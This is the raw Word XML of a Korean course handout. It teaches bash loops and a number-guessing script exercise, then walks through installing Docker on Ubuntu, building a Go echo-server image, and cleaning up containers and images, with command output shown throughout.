          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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4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 ! -f $1 ]</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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4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echo '존재하지 않는 파일입니다.'</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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exit 1</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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4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 -3 $1</w:t>
            </w:r>
          </w:p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  <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_98dq67twgbbt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루프 사용법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hap=0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# for i in 1 2 3 4 5 6 7 8 9 10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# for (( i = 1 ; i &lt;= 10 ; i ++ ))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# for i in {1..10..2}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for i in $(seq 1 10)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do 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ab/>
        <w:t xml:space="preserve">hap=`expr $hap + $i`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echo "HAP is " $hap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exit 0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구구단 출력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2 x 1 = 2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2 x 2 = 4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: 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2 x 9 = 18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3 x 1 = 3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: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9 x 9 = 81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i x j = x</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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(( i = 2 ; i &lt; 10 ; i ++ ))</w:t>
            </w:r>
          </w:p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for (( j = 1 ; j &lt; 10 ; j ++ ))</w:t>
            </w:r>
          </w:p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</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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echo $i x $j = `expr $i \* $j`</w:t>
            </w:r>
          </w:p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done</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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2 x 1 = 2</w:t>
        <w:tab/>
        <w:t xml:space="preserve">3 x 1 = 3</w:t>
        <w:tab/>
        <w:t xml:space="preserve">.. 9 x 1 = 9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ab/>
        <w:t xml:space="preserve">: </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">: 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2 x 9 = 18</w:t>
        <w:tab/>
        <w:t xml:space="preserve">3 x 9 = 27</w:t>
        <w:tab/>
        <w:t xml:space="preserve">.. 9 x 9 = 81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4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i x j = x</w:t>
            </w:r>
          </w:p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(( j = 1 ; j &lt; 10 ; j ++ ))</w:t>
            </w:r>
          </w:p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4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for (( i = 2 ; i &lt; 10 ; i ++ ))</w:t>
            </w:r>
          </w:p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</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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printf "%s x %s = %s \t" $i $j `expr $i \* $j`</w:t>
            </w:r>
          </w:p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done</w:t>
            </w:r>
          </w:p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printf "\n"</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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4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4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i x j = x</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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(( j = 1 ; j &lt; 10 ; j ++ ))</w:t>
            </w:r>
          </w:p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for (( i = 2 ; i &lt; 10 ; i ++ ))</w:t>
            </w:r>
          </w:p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</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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# printf "%s x %s = %s \t" $i $j `expr $i \* $j`</w:t>
            </w:r>
          </w:p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x=`expr $i \* $j`</w:t>
            </w:r>
          </w:p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echo -e -n "$i x $j = $x\t"</w:t>
            </w:r>
          </w:p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done</w:t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# printf "\n"</w:t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echo</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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4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  <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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문제. quiz.sh 을 작성하시오.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004D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임의의 숫자를 생성 : rand</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004D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사용자가 숫자를 입력해서 1)에서 생성한 숫자를 맞추는 게임</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004D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만약, 사용자가 입력한 숫자가 1)에서 생성한 숫자와 다르면, 크다, 작다 메시지를 출력하고, 맞으면 정답 메시지를 출력하고 종료한다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004D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맞추는 회수는 10회로 제한한다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004D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10회를 초과하면 실패 메시지를 출력하고 종료한다.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4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r=$(rand)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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count=0</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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 [ $count -lt 10 ]</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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4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echo 숫자를 입력하세요.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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read num</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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if [ $num -eq $r ]</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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then</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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echo 정답입니다.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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exit 0</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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fi</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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if [ $num -lt $r ] </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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then</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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echo 더 큰 수를 입력하세요.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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else </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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echo 더 작은 수를 입력하세요.</w:t>
            </w:r>
          </w:p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fi</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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count=`expr $count + 1`</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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  <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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회수를 초과했습니다.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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1</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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Title"/>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:cs="Malgun Gothic" w:eastAsia="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_myy9js7wwfop" w:id="28"/>
      <w:bookmarkEnd w:id="2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Docker</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004F5">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:cs="Malgun Gothic" w:eastAsia="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_xsatwq1w10hp" w:id="29"/>
      <w:bookmarkEnd w:id="2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참고자료</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004F6">
      <w:pPr>
        <w:rPr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http://www.pyrasis.com/docker.html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https://docs.docker.com/engine/reference/commandline/cli/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https://www.slideshare.net/pyrasis/docker-fordummies-44424016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>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId50">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="ff0000"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://myanjini.tistory.com/category/%EB%8F%84%EC%BB%A4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pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:cs="Malgun Gothic" w:eastAsia="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_gusnt3wxavw7" w:id="30"/>
      <w:bookmarkEnd w:id="3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Docker 설치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공식문서 ⇒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https://docs.docker.com/install/linux/docker-ce/ubuntu/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* VMware server 이미지를 초기설정 상태로 돌린 후 작업합니다.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도커 레파지토리를 추가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# gedit /etc/apt/sources.list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deb </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">https</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">://apt.dockerproject.org/repo ubuntu-xenial main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HTTPS 통신에 사용되는 패키지와 공개키를 설치</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000050C">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0000ff"/>
        </w:rPr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color w:val="0000ff"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">apt-get install -y apt-transport-https ca-certificates curl gnupg-agent software-properties-common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패키지 목록을 읽는 중입니다... 완료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의존성 트리를 만드는 중입니다       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상태 정보를 읽는 중입니다... 완료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apt-transport-https is already the newest version (1.2.10ubuntu1).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apt-transport-https 패키지는 수동설치로 지정합니다.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ca-certificates is already the newest version (20160104ubuntu1).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ca-certificates 패키지는 수동설치로 지정합니다.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curl is already the newest version (7.47.0-1ubuntu2).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curl 패키지는 수동설치로 지정합니다.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gnupg-agent is already the newest version (2.1.11-6ubuntu2).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gnupg-agent 패키지는 수동설치로 지정합니다.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software-properties-common is already the newest version (0.96.20).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software-properties-common 패키지는 수동설치로 지정합니다.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0개 업그레이드, 0개 새로 설치, 0개 제거 및 0개 업그레이드 안 함.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color w:val="0000ff"/>
        </w:rPr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color w:val="0000ff"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">apt-key adv --keyserver hkp://p80.pool.sks-keyservers.net:80 --recv-keys 58118E89F3A912897C070ADBF76221572C52609D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Executing: /tmp/tmp.XkzJ6mLu4r/gpg.1.sh --keyserver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hkp://p80.pool.sks-keyservers.net:80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--recv-keys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58118E89F3A912897C070ADBF76221572C52609D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gpg: requesting key 2C52609D from hkp server p80.pool.sks-keyservers.net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gpg: key 2C52609D: public key "Docker Release Tool (releasedocker) &lt;docker@docker.com&gt;" imported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gpg: Total number processed: 1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gpg:               imported: 1  (RSA: 1)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color w:val="0000ff"/>
        </w:rPr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color w:val="0000ff"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">apt-get update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linux-image-extra와 docker-engine 패키지를 설치</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000529">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0000ff"/>
        </w:rPr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color w:val="0000ff"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">apt-get install linux-image-extra-$(uname -r)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000052A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0000ff"/>
        </w:rPr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color w:val="0000ff"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">apt-get install docker-engine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root@server:/etc/apt# </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="0000ff"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">docker version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Client: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Version:      17.05.0-ce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API version:  1.29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Go version:   go1.7.5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Git commit:   89658be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Built:        Thu May  4 22:10:54 2017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OS/Arch:      linux/amd64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Server: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Version:      17.05.0-ce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API version:  1.29 (minimum version 1.12)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Go version:   go1.7.5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Git commit:   89658be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Built:        Thu May  4 22:10:54 2017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 OS/Arch:      linux/amd64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Experimental: false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main.go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main</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005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( </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005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"fmt" </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005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"log"</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005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"net/http"</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005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5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 main() {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005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http.HandleFunc("/", func(w http.ResponseWriter, r *http.Request) {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005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log.Println("received request")</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005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fmt.Fprintf(w, "Hello Docker !!!")</w:t>
            </w:r>
          </w:p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 xml:space="preserve">})</w:t>
            </w:r>
          </w:p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log.Println("start server")</w:t>
            </w:r>
          </w:p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server := &amp;http.Server{Addr: ":8080"}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005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if err := server.ListenAndServe(); err != nil {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005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log.Println(err)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005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5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image build -t example/echo:latest . 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Sending build context to Docker daemon  3.072kB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Step 1/4 : FROM golang:1.9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1.9: Pulling from library/golang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55cbf04beb70: Pull complete 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1607093a898c: Pull complete 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9a8ea045c926: Pull complete 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d4eee24d4dac: Pull complete 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9c35c9787a2f: Pull complete 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8b376bbb244f: Pull complete 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0d4eafcc732a: Pull complete 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186b06a99029: Pull complete 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Digest: sha256:8b5968585131604a92af02f5690713efadf029cc8dad53f79280b87a80eb1354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Status: Downloaded newer image for golang:1.9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---&gt; ef89ef5c42a9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Step 2/4 : RUN mkdir /echo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---&gt; Running in 28fc48e76b1a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---&gt; 024d93e00764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Removing intermediate container 28fc48e76b1a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Step 3/4 : COPY main.go /echo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---&gt; 9536233ba248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Removing intermediate container d660cc064687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Step 4/4 : CMD go run /echo/main.go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---&gt; Running in e58fc269864c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---&gt; 6775e8903765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Removing intermediate container e58fc269864c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Successfully built 6775e8903765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Successfully tagged example/echo:latest</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000057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image ls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REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000057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example/echo        latest              6775e8903765        4 minutes ago       750MB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golang              1.9                 ef89ef5c42a9        10 months ago       750MB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image build -t example/echo:latest . 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Sending build context to Docker daemon  3.072kB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Step 1/4 : FROM golang:1.9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 ---&gt; ef89ef5c42a9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Step 2/4 : RUN mkdir /echo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---&gt; Using cache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 ---&gt; 024d93e00764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Step 3/4 : COPY main.go /echo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---&gt; 76b9aa0125fe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Removing intermediate container 1a437913aa6f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Step 4/4 : CMD go run /echo/main.go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---&gt; Running in 891755cd6071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---&gt; 8da1dcd16f94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Removing intermediate container 891755cd6071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Successfully built 8da1dcd16f94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Successfully tagged example/echo:latest</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000058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image ls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REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE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example/echo        latest              8da1dcd16f94        52 seconds ago      750MB</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000058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&lt;none&gt;              &lt;none&gt;    </w:t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color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">6775e8903765        9 minutes ago       750MB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golang              1.9                 ef89ef5c42a9        10 months ago       750MB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root@server:~/docker# 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root@server:~/docker# docker container run -p 9000:8080 -d example/echo:latest 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nginx 를 베이스 이미지로 하는 웹 서버를 컨테이너로 실행합니다. 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index.html 파일에 자신의 이름을 입력한 후 , … 옆 사람이 해당 페이지를 브라우저를 통해서 확인할 수 있도록 하세요.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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_vyiqn8ubtpzn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이름의 컨테이너를 조회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# docker container ls -a --filter="name=ooo"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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_5kfi38oraf5i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이름의 컨테이너를 삭제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# docker container rm -f $(docker container ls -aq --filter="name=ooo")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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_br2j66qy8j78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이름의 컨테이너를 삭제하고 해당 이름의 컨테이너를 실행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# docker container rm -f $(docker container ls -aq --filter="name=ooo") ; docker container run --name ooo IMAGE_NAME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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_etdm0siwxnz5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 또는 중지 상태의 컨테이너를 모두 강제로 삭제</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005A9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container rm -f $(docker container ls -aq) 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29cd243bb33c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66b6112733b4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e10ea0c688f3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32683e31e079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29d29572f740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f9bb7667c03d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72b9949c3057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1cd8f43f4128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ccc776c9e24d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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_y48wnrcut6ab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이미지를 삭제</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005B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image rm $(docker image ls -aq)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Untagged: echo:latest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Deleted: sha256:8a71248c27719d450f3931e9524ae920c6f9fca840fbdbb536fdedbe6202fe1c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Deleted: sha256:e74b9cbe029e9ef4b937056854d8682e622687989f51e3c9ed0f5bb8bc06a3a5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Deleted: sha256:62f3625e07d45e3b022703d5922774bb40276bec6ab77ad0d80bd11dddaf6a84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Deleted: sha256:b9fd23c7d96cc642ba6fd28cd1d8f2f194cf8954aa813d1c743c75b347beca24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Deleted: sha256:ebd9e9cc06fb0276cd66f50d8930430f2f790e400b4dd32cd8a0d6ee3cbc6fc9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Untagged: mongo:latest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Untagged: mongo@sha256:93bd5412f16f3b9f7e12eb94813087f195dad950807a8ca74aa2db080c203990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Deleted: sha256:0fb47b43df1987480928787d3907f3be50941506ede82298b920df07011b8d94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Deleted: sha256:603c757ca3827d6ceadbfefe473120a59c4c4cf81face24ae34603ddb196ef8c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Deleted: sha256:7c395d60580ec95a137880c06b1f2d74ea4f36f50ddd91e718223a27ffae1b00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Deleted: sha256:2b27eee3d8672a13f05ffe250c8de1643fa31f3e26f3c5f5b4bf96f2dcfd0ca2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Deleted: sha256:fb782f3494942d520e82f4889b30ca1a722fb546a4d7a74adbae967d35ea2dd4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Deleted: sha256:aeeb13954eec529e09c0fa877bb30bf3975599594c87ce465c72c0b76cbf90a9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Deleted: sha256:3fd8c9f3d1c8b52d3fc47c4710556633056b7b306b0abdb5c14501e2644e3790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Deleted: sha256:e7bcc2a3fe764a425c8485756e7752a89e029fbf60db34bb9706e9abd31c2638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Deleted: sha256:3ee85fbb05b9c35a5963dfccd752520d7735d08467322f97b91266d124bcbc2e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Deleted: sha256:fd85a4e7f6b58ba7acc3dccce68d1acd2992830bdcf176b06c0813a9349fd85e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Deleted: sha256:5bcad8f8b858991e09c1ea59d2b1d8a1fcb424445493825972918b48c5170289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Deleted: sha256:9adaba72eca85f66961ee4fb5c0b646b078377439690fa94827bf35a5f0cfd5e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Deleted: sha256:ccab9ec9909359830f26cd442a80b08ab27a8fd34881495da7a17ac224ceebf1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Deleted: sha256:739482a9723dbee6dbdad6b669090e96d5f57e2aa27c131015cce8969d0d4efa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Untagged: ubuntu:latest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Untagged: ubuntu@sha256:f08638ec7ddc90065187e7eabdfac3c96e5ff0f6b2f1762cf31a4f49b53000a5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Deleted: sha256:7698f282e5242af2b9d2291458d4e425c75b25b0008c1e058d66b717b4c06fa9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Deleted: sha256:027b23fdf3957673017df55aa29d754121aee8a7ed5cc2898856f898e9220d2c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Deleted: sha256:0dfbdc7dee936a74958b05bc62776d5310abb129cfde4302b7bcdf0392561496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Deleted: sha256:02571d034293cb241c078d7ecbf7a84b83a5df2508f11a91de26ec38eb6122f1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Untagged: nginx:latest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Untagged: nginx@sha256:23b4dcdf0d34d4a129755fc6f52e1c6e23bb34ea011b315d87e193033bcd1b68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Deleted: sha256:53f3fd8007f76bd23bf663ad5f5009c8941f63828ae458cef584b5f85dc0a7bf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Deleted: sha256:50183b8336fcc9552a55c86895cdfdfb6f1bb349a951da638f22f645ce235926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Deleted: sha256:093a0ead7cedbef266292a1b08e478489ed6584170f0d82127c5ac9a10fd8303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Deleted: sha256:6270adb5794c6987109e54af00ab456977c5d5cc6f1bc52c1ce58d32ec0f15f4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Untagged: golang:1.9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Untagged: golang@sha256:8b5968585131604a92af02f5690713efadf029cc8dad53f79280b87a80eb1354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Deleted: sha256:ef89ef5c42a90ec98bda7bbef0495c1ca6f43a31d059148c368b71858de463d2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Deleted: sha256:17390723275513e7505aae3369480402f214a8114cac79966639cbc7ed14f7e6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Deleted: sha256:d676491c2e24f03e941c718c3eca48ef400a6e801b20ee6519d5e064b2afcfa6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Deleted: sha256:14027861f16bb2c874c1212e8969e90e70e32b8d31e59db69048308596f841d1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Deleted: sha256:549d1efa00654bcaa5e91e449192ad71557b694bf8a810c4b8d9df0246a00164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Deleted: sha256:2d9c829ae3f7ff3e148e5c7c3a1cf378b0f90b79035e2fe9a8d78c63ccde4c89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Deleted: sha256:b1ae7168c6f3e061aa3943740ec3ceaf8e582dc65feab31d2b56d464a5062d59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Deleted: sha256:4a495dbc04bd205c728297a08cf203988e91caeafe4b21fcad94c893a53d96dc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Deleted: sha256:3b10514a95bec77489a57d6e2fbfddb7ddfdb643907470ce5de0f1b05c603706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Error response from daemon: conflict: unable to delete e74b9cbe029e (cannot be forced) - image has dependent child images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Error response from daemon: No such image: b9fd23c7d96c:latest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root@server:~/docker# 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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_a0f5z1kje0bc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작업 위치와 Dockerfile 내용 확인</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005EA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pwd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005E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/root/docker</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005E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</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="0000ff"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> cat Dockerfile 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FROM golang:1.9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RUN mkdir /echo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COPY main.go /echo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CMD [ "go", "run", "/echo/main.go" ]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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ftf6y64bjwg3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echo라는 이름의 도커 이미지 생성</w:t>
      </w:r>
    </w:p>
